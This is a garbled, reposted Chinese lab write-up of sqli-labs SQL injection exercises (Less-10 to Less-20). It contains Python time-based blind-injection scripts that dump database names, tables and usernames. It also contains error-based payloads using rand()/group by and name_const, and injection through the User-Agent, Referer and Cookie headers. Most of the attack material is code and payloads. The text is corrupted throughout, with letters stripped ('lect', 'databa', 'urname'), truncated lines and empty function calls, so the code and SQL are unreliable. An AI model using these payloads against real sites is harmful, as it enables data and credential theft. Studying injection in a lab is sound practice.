62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))>

63 s_time = ()

64 (url=sql, timeout=3)

65 e_time = ()

66 # print(sql)

67 if (e_time - s_time) > 3:

68 print(table_name, "中的所有字段名长:", i)

69 break

70 def column_name(column_length,table_name,databa_name):

71 global url

72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+

73 table_name = ''

74 for num in range(1, column_length + 1):

75 for asc in range(32, 128):

76 s_time = ()

77 ((num=num, asc=asc))

78 e_time = ()

79 if (e_time - s_time) > 3:

80 table_name += chr(asc)

81 print("所有的数据表名:", table_name)

82 break

83 def data_length(column_name,table_name):

84 global url

85 for i in range(1, 10000):

86 sql = url + " and if((lect length((lect group_concat("+column_name+" parator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"

87 s_time = ()

88 (url=sql, timeout=3)

89 e_time = ()

90 # print(sql)

91 if (e_time - s_time) > 3:

92 print(column_name, "字段的值长:", i)

93 break

94 def data_detail(data_length,column_name,table_name):

95 global url

96 sql = url + " and if(ascii(substr((lect group_concat("+column_name+" parator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"

97 data = ''

98 for num in range(1, data_length + 1):

99 for asc in range(32, 128):

100 s_time = ()

101 ((num=num, asc=asc))

102 e_time = ()

103 if (e_time - s_time) > 3:

104 data += chr(asc)

105 print(column_name,"字段的值:", data)

106 break

107 if __name__ == '__main__':

108 # databa_length() # 8

109 # databa_name(8) #curity

110 # table_length('curity')#curity 中的所有数据表名长: 29

111 # table_name(29, 'curity')#所有的数据表名: emails@referers@uagents@urs

112 # column_length('urs','curity') #20

113 # column_name(20,'urs','curity')#所有的数据表名: id@urname@password

114 # data_length('urname', 'urs')#91

115 data_detail(91, 'urname', 'urs')#urname 字段的值: Dumb@Angelina@Dummy@cure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4

9⼀样就改了个url

POST

Less-11:post注⼊

终于开始写post型的了,⼀开始打开这个界⾯真的是⼀脸懵逼,在逛了⼀波攻略,在师傅博客的点播下,才发现这个的套路跟less-1⼀⽑⼀样,就是形似变化⼀下,可能不那

么直接罢了Orz

Less-12:双引号+括号闭合

放⼤了⼀点burp,嘻嘻嘻。

Less-13:报错注⼊

背景知识:

这写是⽹上的⼀位师傅提供的构造,但是他没有详解【果然我还是太菜了,答案都看不懂Orz

Duplicate entry '::curity::0' for key 1

') union lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)) as a from information_ group by a # &passwd=1# &submit=Submit

lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2))from information_ group by concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2));

Duplicate entry '::5.0.51a-3ubuntu5::0' for key 1

') union lect count(*),concat(0x3a,0x3a,(lect version()),0x3a,0x3a,floor(rand()*2))as a from information_ group by a # &passwd=1&submit=Submit

Duplicate entry '5.0.51a-3ubuntu5::curity::root@localhost:1' for key 1

') union lect 1,2 from (lect count(*),concat((lect concat(version(),0x3a,0x3a,databa(),0x3a,0x3a,ur(),0x3a) limit 0,1),floor(rand(0)*2))x from information_ group by x)a # &passwd=1&submit=Submit

Duplicate entry '13::1' for key 1

') union lect 1,2 from (lect count(*),concat((lect concat(count(*),0x3a, 0x3a) from limit 0,1),floor(rand(0)*2))x from information_ group by x)a # &passwd= ') or 1=1 # &submit=Submit

Duplicate entry 'Dumb::Dumb::1' for key 1

') union lect 1,2 from (lect count(*),concat((lect concat(urname,0x3a, 0x3a,password,0x3a, 0x3a) from limit 0,1),floor(rand(0)*2))x from information_ group by

View Code

') union lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2)) as a from information_ group by a # &passwd=1# &submit=Submi

相当于:

lect count(*),concat(0x3a,0x3a,(lect databa()),0x3a,0x3a,floor(rand()*2))from information_ group by concat(0x3a,0x3a,(lect

databa()),0x3a,0x3a,floor(rand()*2));

报错类型:主键重复

只要是countrand(0)group by三个连⽤就会造成这种报错,与位置⽆关

mysql官⽅说,在执⾏group by语句的时候,group by语句后⾯的字段会被运算两次

rand(0)⽣成的序列更稳定

concat()只是把 ":" "数据库名" "floor(rand(0)*2)"的执⾏结果连接起来,看起来⽅便的,( 0x3a = : )

0x03 主键重复

这⾥利⽤到了count()group by在遇到rand()产⽣的重复值时报错的思路。⽹上⽐较常见的payload是这样的:

mysql> lect count(*) from test group by concat(version(),floor(rand(0)*2));

ERROR 1062 (23000): Duplicate entry '5.7.171' for key ''

可以看到错误类型是duplicate entry,即主键重复。实际上只要是countrand()group by三个连⽤就会造成这种报错,与位置⽆关:

mysql> lect count(*),concat(version(),floor(rand(0)*2))x from information_ group by x;

ERROR 1062 (23000): Duplicate entry '5.7.171' for key ''

这种报错⽅法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每⼀⾏,将结果保存于临时表中。读取每⼀⾏的key时,如果key存在于临时

表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插⼊key所在⾏的数据。举个例⼦,表中数据如下:

mysql> lect * from test;

+------+-------+

| id | name |

+------+-------+

| 0 | jack |

| 1 | jack |

| 2 | tom |

| 3 | candy |

| 4 | tommy |

| 5 | jerry |

+------+-------+

6 rows in t (0.00 c)

我们以lect count(*) from test group by name语句说明⼤致过程如下:

先是建⽴虚拟表,其中key为主键,不可重复:

keycount(*)

开始查询数据,去数据库数据,然后查看虚拟表是否存在,不存在则插⼊新记录,存在则count(*)字段直接加1

keycount(*)

jack1

keycount(*)

jack1+1

keycount(*)

jack1+1

tom1

keycount(*)

jack1+1

tom1

candy1

当这个操作遇到rand(0)*2时,就会发⽣错误,其原因在于rand(0)是个稳定的序列,我们计算两次rand(0)

mysql> lect rand(0) from test;

+---------------------+

| rand(0) |

+---------------------+

| 0.15522 |

| 0.628 |

| 0.6387474552157777 |

| 0.33147 |

| 0.739218 |

| 0.7334 |

+---------------------+

6 rows in t (0.00 c)

mysql> lect rand(0) from test;

+---------------------+

| rand(0) |

+---------------------+

| 0.15522 |

| 0.628 |

| 0.6387474552157777 |

| 0.33147 |

| 0.739218 |

| 0.7334 |

+---------------------+

6 rows in t (0.00 c)

同理,floor(rand(0)*2)则会固定得到的序列(这个很重要)

mysql> lect floor(rand(0)*2) from test;

+------------------+

| floor(rand(0)*2) |

+------------------+

| 0 |

| 1 |

| 1 |

| 0 |

| 1 |

| 1 |

+------------------+

6 rows in t (0.00 c)

回到之前的group by语句上,我们将其改为lect count(*) from test group by floor(rand(0)*2),看看每⼀步是什么情况:

先建⽴空表

keycount(*)

取第⼀条记录,执⾏floor(rand(0)*2),发现结果为0(第⼀次计算),查询虚表,发现没有该键值,则会再计算⼀次floor(rand(0)*2),将结果1(第⼆次计算)插⼊虚表,如下:

keycount(*)

11

查第⼆条记录,再次计算floor(rand(0)*2),发现结果为1(第三次计算),查询虚表,发现键值1存在,所以此时不在计算第⼆次,直接count(*)值加1,如下:

keycount(*)

11+1

查第三条记录,再次计算floor(rand(0)*2),发现结果为0(第四次计算),发现键值没有0,则尝试插⼊记录,此时会⼜⼀次计算floor(rand(0)*2),结果1(5次计算)当作虚表的主键,⽽此时1

这个主键已经存在于虚表中了,所以在插⼊的时候就会报主键重复的错误了。

最终报错的结果,即主键'1'重复:

mysql> lect count(*) from test group by floor(rand(0)*2);

ERROR 1062 (23000): Duplicate entry '1' for key ''

整个查询过程中,floor(rand(0)*2)被计算了5次,查询原始数据表3次,所以表中需要⾄少3条数据才能报错(也就是最少要让floor执⾏5次)。关于这个rand()的问题,官⽅⽂档在有个说明:

RAND() in a WHERE clau is evaluated for every row (when lecting from one table) or combination of rows (when lecting from a multiple-table join). Thus, for optimizer purpos, RAND()

View Code

如果有⼀个序列开头时0,1,0或者1,0,1,则⽆论如何都不会报错了,因为虚表开头两个主键会分别是01,后⾯的就直接count(*)1了:

mysql> lect floor(rand(1)*2) from test;

+------------------+

| floor(rand(1)*2) |

+------------------+

| 0 |

| 1 |

| 0 |

| 0 |

| 0 |

| 1 |

+------------------+

6 rows in t (0.00 c)

mysql> lect count(*) from test group by floor(rand(1)*2);

+----------+

| count(*) |

+----------+

| 3 |

| 3 |

+----------+

2 rows in t (0.00 c)

查表:

uname=') union lect count(*),concat(0x3a,(lect table_name from information_ where table_schema=databa() limit

1,1),0x3a,floor(rand(0)*2)) as a from information_ group by a# &passwd=1# &submit=Submit

但是发现还是查不到更加详细的数据:

原来是group_concat()的问题,后来改成limit 0,1过了,但是不知道为什么group_concat失败了:

由于不知道curity库中到底有⼏张表,所以发包后,根据包长的⼤⼩可以看出有4张表:

查字段名:

uname=') union lect count(*),concat(0x3a,(lect column_name from information_s where table_schema='curity' and

table_name='emails' limit 0,1),0x3a,floor(rand(0)*2)) as a from information_ group by a# &passwd=1# &submit=Submit

接下来同理发包,得到 emails表中只有两个字段:

emal_id的字段值:

uname=') union lect count(*),concat(0x3a,(lect email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from

information_ group by a # &passwd=1# &submit=Submit

后记:

在查资料的时候发现了⼀个超级厉害的函数:name_const()

name_const(): mysql存储过程中的本地变量会被⼀个内部函数 name_const 转化,似乎是专门为存储过程设计的,没有提到有其它特别之处.

⽤法:union lect 1,2,3 from (lect name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

查表名:

=1') union lect 1,3 from (lect name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1),name_const((lect

table_name from information_ where table_schema='curity' limit 0,1),1))x#

=1') union lect 1,3 from (lect name_const((lect group_concat(table_name,0x20) from information_ where

table_schema='curity'),1),name_const((lect group_concat(table_name,0x20) from information_ where table_schema='curity'),1))x#

3.后⾯的以此类推

Less-14:双引号绕过+报错注⼊(更13⼀样)

⽅法⼀:

uname=1" union lect 1,3 from (lect name_const((lect table_name from information_ where table_schema='curity' limit 0,1),1),name_const((lect

table_name from information_ where table_schema='curity' limit 0,1),1))x#&passwd=12&submit=Submit

⽅法⼆:

uname=" union lect count(*),concat(0x3a,(lect email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_ group by a # &passwd=1#

&submit=Submit

Less-15:时间盲注+单引号

终于艰难的写出来了Orz。其中table_name()函数有参考⼀位师傅的脚本,但是我发现他跑到好慢,然后其他的就⽤的是 if 来写了,也懒得改了,⼤家仅供参考。

1 '''

2 @Modify Time @Author

3 ------------ -------

4 2019/10/5 18:21 laoalo

5 '''

12 url = "192.168.199.190/sqli-labs-master/Less-15/"

13

14

15 def databa_length():

16 global url

17 for i in range(1,10000):

18 s_time = ()

19 data = {

20 'uname' : "admin' and if ( length(databa()) < %d , sleep(3) , 1)#" % (i),

21 'passwd': 'admin',

22 # 'submit': 'Submit'

23 }

24 print(data['uname'])

25 (url=url, data=data)

26 e_time = ()

27 if (e_time - s_time).conds > 2:

28 print("tttt数据库长:", i-1)

29 break

30 def databa_name(length):

31 global url

32 name=""

33 for j in range(1,length+1):

34 for i in range(32, 128):

35 s_time = ()

36 data = {

37 'uname': "admin' and if (ascii (substr(databa(), %d, 1))=%d, sleep(3), 1)#" % ( j , i),

38 'passwd': 'admin',

39 # 'submit': 'Submit'

40 }

41 re=(url=url, data=data)

42 e_time = ()

43 print(data['uname'])

44 # print("tttt数据库名:", chr(i))

45 if (e_time - s_time) > 2:

46 name += chr(i)

47 print("tttt数据库名:", name)

48 break

49 def table_length():

50 global url

51 for i in range(1, 10000):

52 s_time = ()

53 data = {

54 'uname': "admin' and if ( length((lect group_concat(table_name) from information_ where table_schema=databa())) < %d , sleep(3) , 1)#" % (i),

55 'passwd': 'admin',

56 # 'submit': 'Submit'

57 }

58 print(data['uname'])

59 (url=url, data=data)

60 e_time = ()

61 if (e_time - s_time).conds > 2:

62 print("tttt所有的数据表长:", i - 1)

63 break

64 def table_name(table_length):

65 global url

66 char = "abcdefghijklmnopqrstuvwxyz_"

67 print("start!")

68 tablename = ""

69 for i in range(0, table_length+1):

70 print("n %d 张表的爆破" %(i+1))

71 for j in range(0, 20):

72 for str in char:

73 # print(str)

74 time1 = ()

75 data = {

76 'uname': "admin'and If((mid((lect table_name from information_ where table_schema=databa() limit %d,1),%d,1))='%s',1,sleep(2))#" % (i, j, str),

77 'passwd': "1"}

78 res = (url, data=data)

79 print(data['uname'])

80 time2 = ()

81 c = (time2 - time1).conds

82 if c < 1:

83 tablename += str

84 print("表名:",tablename)

85 break

86

87 print("tttt表名:",tablename)

88 def colums_length(table_name):

89 global url

90 for i in range(1,10000):

91 s_time = ()

92 data = {

93 'uname' : "admin' and if ( length((lect group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=databa())) < %d , sleep(3) , 1)#

94 'passwd': 'admin',

95 # 'submit': 'Submit'

96 }

97 print(data['uname'])

98 (url=url, data=data)

99 e_time = ()

100 if (e_time - s_time).conds > 2:

101 print("tttt字段长:", i-1)

102 break

103 def column_name(length,table_name):

104 global url

105 column_name = ""

106 for j in range(1, length + 1):

107 for i in range(32, 128):

108 s_time = ()

109 data = {

110 'uname': "admin' and if (ascii (substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"' and table_schema=databa()), %d, 1))=%d, sleep(3), 1)#

111 'passwd': 'admin',

112 # 'submit': 'Submit'

113 }

114 re = (url=url, data=data)

115 e_time = ()

116 print(data['uname'])

117 # print("tttt数据库名:", chr(i))

118 if (e_time - s_time) > 2:

119 column_name += chr(i)

120 print("tttt字段名:", column_name)

121 break

122 def data_length(colums,table):

123 global url

124 for i in range(1, 10000):

125 s_time = ()

126 data = {

127 'uname': "admin' and if ( length((lect group_concat("+colums+") from "+table+")) < %d , sleep(3) , 1)#" % (i),

128 'passwd': 'admin',

129 # 'submit': 'Submit'

130 }

131 print(data['uname'])

132 (url=url, data=data)

133 e_time = ()

134 if (e_time - s_time).conds > 2:

135 print("tttt所有的数据长:", i - 1)

136 break

137 def data_datail(length,colums,table):

138 global url

139 column_name = ""

140 for j in range(1, length + 1):

141 for i in range(32, 128):

142 s_time = ()

143 data = {

144 'uname': "admin' and if (ascii (substr((lect group_concat("+colums+") from "+table+"), %d, 1))=%d, sleep(3), 1)#" % (j, i),

145 'passwd': 'admin',

146 # 'submit': 'Submit'

147 }

148 re = (url=url, data=data)

149 e_time = ()

150 print(data['uname'])

151 # print("tttt数据库名:", chr(i))

152 if (e_time - s_time) > 2:

153 column_name += chr(i)

154 print("tttt字段名:", column_name)

155 break

156

157 if __name__ == '__main__':

158 # databa_length()

159 # databa_name(8)

160 # table_length()

161 # table_name(10)

162 # colums_length('emails')

163 # column_name(11,'emails')

164 # data_length('email_id','emails')

165 data_datail(157,'email_id','emails')

爆破脚本

当然还可以⽤burp直接慢慢发包:例如查数据库长度:直接慢慢发包:例如查数据库长度:uname=admin' and if (length(databa())>1,0,sleep(3))+--+&passwd=admin&submit=Submit

根据时延判断出表长为8

⾄于sqlmap就算了吧,好⽍是练习⼿动啊喂。

Less-16:双引号+括号+时间盲注

15⼀样,脚本改改就可以上

Less-17:表⾯上的双重注⼊

上源码,可以看到过滤了uname:

1 <?php

2 //including the Mysql connect parameters.

3 include("../sql-connections/");

4 error_reporting(0);

5

6 function check_input($value)

7 {

8 /**

9 * 第⼀个条件截取长度为15

10 */

11 if(!empty($value))

12 {

13 // truncation (e comments)

14 $value = substr($value,0,15);

15 }

16 // Stripslashes if magic quotes enabled

17 /* get_magic_quotes_gpc()

18 get_magic_quotes_gpc()函数取得PHP环境配置的变量magic_quotes_gpc(GPC, Get/Post/Cookie)值。

19 返回0表⽰本功能关闭,返回1表⽰本功能打开。

20

21 magic_quotes_gpc打开时,

22 所有的'(单引号)"(双引号)(反斜杠)NULL(空字符)

23 会⾃动转为含有反斜杠的溢出字符。

24 */

25

26 /* stripslashes():

27

28 stripslashes(string)函数删除由addslashes()函数添加的反斜杠。

29

30 addslashes(string)函数返回在预定义字符之前添加反斜杠的字符串:

31 单引号 '

32 双引号 "

33 反斜杠

34 空字符 NULL

35 该函数可⽤于为存储在数据库中的字符串以及数据库查询语句准备字符串。

36

37 注意:默认地,PHP对所有的GETPOSTCOOKIE数据⾃动运⾏addslashes()

38 所以不应对已转义过的字符串使⽤addslashes(),因为这样会导致双层转义。

39 遇到这种情况时可以使⽤函数get_magic_quotes_gpc()进⾏检测。

40

41 */

42 /**

43 * 第⼆个条件把已有的转义字符去掉

44 */

45 if (get_magic_quotes_gpc())

46 {

47 $value = stripslashes($value);

48 }

49

50 // Quote if not a number

51

52 /*

53 ctype_digit(string)函数

54 检查字符串中每个字符是否都是⼗进制数字,若是则返回TRUE,否则返回FALSE

55 */

56 /**

57 * 第三个条件对字符型的输⼊进⾏转义

58 */

59 if (!ctype_digit($value))

60 {

61 $value = "'" . mysql_real_escape_string($value) . "'";

62 /*

63 mysql_real_escape_string()函数

64 mysql_real_escape_string(string,connection)

65

66 参数:描述

67 string:必需,规定要转义的字符串

68 connection:可选,规定MySQL连接。如果未规定,则使⽤上⼀个连接

69 mysql_real_escape_string()函数转义 SQL 语句中使⽤的字符串中的特殊字符:x00,n,r,,',",x1a

70 如果成功,则该函数返回被转义的字符串。如果失败,则返回FALSE

78 {

79 /**

80 * 第四个条件,如果是数字型的输⼊就让他变成数字,PS:话说这样就不能⽤⼗六进制注⼊了吧

81 *

82 */

83 $value = intval($value);

84 /*

85

86 intval(var[,ba])

87 参数:描述

88 var:要转换成integer的数量值

89 ba:转化所使⽤的进制

90 intval()函数获取变量的整数值。通过使⽤指定的进制ba转换(默认是⼗进制),返回变量varinteger数值。

91 intval()不能⽤于object,否则会产⽣E_NOTICE错误并返回1

92

93 成功时返回varinteger值,失败时返回0

94 空的array返回0,⾮空的array返回1,最⼤的值取决于操作系统。

95

96 如果ba0,通过检测var的格式来决定使⽤的进制:

97

98 如果字符串包括了0x0X的前缀,使⽤16进制hex;否则,

99 如果字符串以0开始,使⽤8进制octal;否则,

100 使⽤10进制decimal

101 */

102 }

103 return $value;

104 }

105

106

107 // take the variables

108 if(ist($_POST['uname']) && ist($_POST['passwd']))

109 {

110 //making sure uname is not injectable

111 $uname=check_input($_POST['uname']);

112

113 $passwd=$_POST['passwd'];

114

115

116 //logging the connection parameters to a file for analysis.

117 $fp=fopen('','a');

118 fwrite($fp,'Ur Name:'.$uname."n");

119 fwrite($fp,'New Password:'.$passwd."n");

120 fclo($fp);

121

122

123 // connectivity

124 @$sql="SELECT urname, password FROM urs WHERE urname= $uname LIMIT 0,1";

125

126 $result=mysql_query($sql);

127 $row = mysql_fetch_array($result);

128 //echo $row;

129 if($row)

130 {

131 //echo '';

132 $row1 = $row['urname'];

133 //echo 'Your Login name:'. $row1;

134 $update="UPDATE urs SET password = '$passwd' WHERE urname='$row1'";

135 mysql_query($update);

136 echo "
";

137

138

139

140 if (mysql_error())

141 {

142 echo '';

143 print_r(mysql_error());

144 echo "

";

尝试基本注⼊:

最后尝试报错注⼊:[ name_const()真好⽤啊喂 ]

uname=admin&passwd=' or (lect 1 from (lect count(*),concat_ws('-',(lect databa()),floor(rand(0)*2)) as a from information_ group by a) b) where

urname='admin'--+#&submit=Submit

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(table_name) from information_ where

table_schema='curity'),1),name_const((lect group_concat(table_name) from information_ where table_schema='curity'),1)) a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(column_name) from information_s where table_schema='curity'

and table_name='emails'),1),name_const((lect group_concat(column_name) from information_s where table_schema='curity' and table_name='emails'),1))

a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from

emails),1)) a)--+

详细解析:

Less-18http头注⼊——ur-agent

1 <?php

2 //including the Mysql connect parameters.

3 include("../sql-connections/");

4 error_reporting(0);

5

78 el

79 {

80 echo '';

81 //echo "Try again loor";

82 print_r(mysql_error());

83 echo "
";

84 echo "
";

85 echo '';

86 echo "";

87 }

88

89 }

View Code

后⾯的⽼套路。

' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from emails),1)) a) and '1'='1

Less-19:http头注⼊——referer

18简直⼀⽑⼀样啊喂。

Referer: ' or (SELECT * FROM (SELECT name_const((lect group_concat(email_id) from emails),1),name_const((lect group_concat(email_id) from emails),1)) a) and '1'='1

Less-20http头注⼊——cookie+代码审计+报错注⼊

详细参照17

cookie: uname=' or (lect 1 from (lect count(*),concat_ws('-',(lect databa()),floor(rand(0)*2)) as a from information_ group by a) b)#

注意点:

不要⽤‘ --+ ’ 注释:

不要加submit参数:

民办学校章程-毕业晚会主持词

【靶场练习_sqli

本文发布于:2023-11-05 17:27:44,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/zhishi/a/1699176464207227.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:【靶场练习_sqli.doc

本文 PDF 下载地址:【靶场练习_sqli.pdf

标签:challenges
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 实用文体写作网旗下知识大全大全栏目是一个全百科类宝库! 优秀范文|法律文书|专利查询|
  • 我要关灯
    我要开灯
  • 返回顶部